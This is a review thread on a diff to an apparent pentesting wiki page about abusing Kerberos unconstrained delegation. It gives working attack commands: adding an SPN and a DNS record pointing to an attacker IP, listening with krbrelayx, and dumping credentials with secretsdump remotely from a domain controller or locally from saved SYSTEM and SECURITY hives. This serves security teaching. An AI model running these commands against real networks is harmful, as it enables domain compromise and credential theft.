ad/movement/kerberos/delegations/unconstrained.md

```diff
@@ -48,11 +48,22 @@ addspn.py -u 'DOMAIN\CompromisedAccont' -p 'LMhash:NThash' -s 'HOST/attacker.DOM
 # 2. Add a DNS entry for the attacker name set in the SPN added in the target machine account's SPNs
 dnstool.py -u 'DOMAIN\CompromisedAccont' -p 'LMhash:NThash' -r 'attacker.DOMAIN_FQDN' -d 'attacker_IP' --action add 'DomainController'
 
-# 3. Start the krbrelayx listener (the AES key is used by default by computer accounts to decrypt tickets)
+# 3. Check that the record was added successfully (< 3 minutes)
+nslookup attacker.DOMAIN_FQDN DomainController
+
+# 4. Start the krbrelayx listener (the AES key is used by default by computer accounts to decrypt tickets)
+# If dump the creds locally, e.g. via secretsdump
 krbrelayx.py --krbsalt 'DOMAINusername' --krbpass 'password'
+# If dump the creds remotely
```

Comment:
What do you mean by "if dump the creds localy/remotely"?

Reply:
# Remotely against the victim 
$ secretsdump.py domain/account:'Passw0rd!'@domaincontroller

To get the AES:aes256-cts-hmac-sha1-96:00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff

# Locally that using the hive has already been dumped 
Cmd > reg.exe save hklm\system system.hive
Cmd > reg.exe save hklm\security security.hive
$ secretsdump.py -system system.hive -security security.hive LOCAL